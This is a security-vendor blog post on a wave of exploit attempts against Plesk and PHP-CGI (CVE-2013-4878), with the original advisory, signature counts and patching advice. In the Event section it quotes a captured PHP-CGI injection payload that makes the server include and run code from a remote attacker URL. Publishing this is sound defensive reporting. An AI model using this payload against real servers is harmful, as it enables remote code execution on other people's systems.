Background on Six Month Old Vulnerability Exploit Attempt

The IBM X-Force Threat Analysis Service (XFTAS) reports on vulnerabilities that need to be brought to the attention of our customers. Such was the case in June of 2013. We found a report on a Plesk Control Panel vulnerability (CVE-2013-4878) and provided the following assessment at that time:

Critical Plesk Vulnerability

Exploit code has been released that is reported to target versions 8.6, 9.0, 9.2, 9.3, and 9.5.4 of Plesk running on the Linux and FreeBSD operating systems. Plesk is a commercial software web administration package that allows an administrator to easily set up new websites, email accounts, and DNS entries via a web-based interface. The vulnerability is reported to rely on a non-default setting in Plesk which exposes the entire /usr/bin directory to the Internet. An attacker who successfully exploits this vulnerability can gain shell access to the victim’s server. Customers should verify that the following Plesk configuration entry is not present:

ScriptAlias /phppath/ "/usr/bin/"

Plesk administrators should contact their distribution channels for more information regarding configuration best practices.

Event

During the weekend of January 4th, the SOC began seeing attacks on our customers that appeared to be attempting to exploit this vulnerability. The payload of these attacks looked like this:

-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+max_execution_time=0+-d+open_basedir=none+-d+auto_prepend_file=hXXp://isp.vc/packets.txt+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-n

Actions Taken

The SOC escalated the event to management and began contacting affected customers. Further analysis of the attack revealed only one attacking IP, 80.82.78.9. It also gave a strong indication that the attack was against the Internet as a whole and not any specific customer or industry. While researching the attack, we saw that other organizations, such as ISC, were aware of activity from this IP address as well. In their report, however, the attack they noted appeared to be targeting potentially vulnerable Linksys devices.

Data Seen

The top ten signatures seen in connection with this attack were:

Count
Signature

206,235

TCP_Service_Sweep

10,394

HTTP: Detect PHP-CGI Remote code Execution vulnerability

3,477

PHP Remote Code Execution

2,212

TCP_Probe_Other

1,803

ICMP_Flood

820

SERVER-WEBAPP PHP-CGI remote file include attempt

453

PHP CGI Query String Parameter Handling Information Disclosure and DoS Vulnerability(34804)

450

SYNFlood

227

TCP SYN Host Sweep

177

PHP CGI Query String Parameter Handling Code Injection Vulnerability(34790)
Scroll to view full table

This is a common tactic among attackers. First they scan for open ports and then, based on their recon, select an appropriate attack vector from the exploits they have in stock.

Summary and Recommendations

Attacks, such as this one, only reinforces the XFTAS’ recommendations to keep operating systems and applications patched in a timely manner. Attacks against new vulnerabilities do not always occur immediately after their announcement. Sometimes, as in this case, it may be months before the vulnerability is exploited.

Further References

More from Software Vulnerabilities

FYSA – Adobe Cold Fusion Path Traversal Vulnerability

2 min read - Summary Adobe has released a security bulletin (APSB24-107) addressing an arbitrary file system read vulnerability in ColdFusion, a web application server. The vulnerability, identified as CVE-2024-53961, can be exploited to read arbitrary files on the system, potentially leading to unauthorized access and data exposure. Threat Topography Threat Type: Arbitrary File System Read Industries Impacted: Technology, Software, and Web Development Geolocation: Global Environment Impact: Web servers running ColdFusion 2021 and 2023 are vulnerable Overview X-Force Incident Command is monitoring the disclosure…

FYSA – Critical RCE Flaw in GNU-Linux Systems

2 min read - Summary The first of a series of blog posts has been published detailing a vulnerability in the Common Unix Printing System (CUPS), which purportedly allows attackers to gain remote access to UNIX-based systems. The vulnerability, which affects various UNIX-based operating systems, can be exploited by sending a specially crafted HTTP request to the CUPS service. Threat Topography Threat Type: Remote code execution vulnerability in CUPS service Industries Impacted: UNIX-based systems across various industries, including but not limited to, finance, healthcare,…

X-Force discovers new vulnerabilities in smart treadmill

7 min read - This research was made possible thanks to contributions from Joshua Merrill. Smart gym equipment is seeing rapid growth in the fitness industry, enabling users to follow customized workouts, stream entertainment on the built-in display, and conveniently track their progress. With the multitude of features available on these internet-connected machines, a group of researchers at IBM X-Force Red considered whether user data was secure and, more importantly, whether there was any risk to the physical safety of users. One of the most…

Topic updates

Get email updates and stay ahead of the latest threats to the security landscape, thought leadership and research.
Subscribe today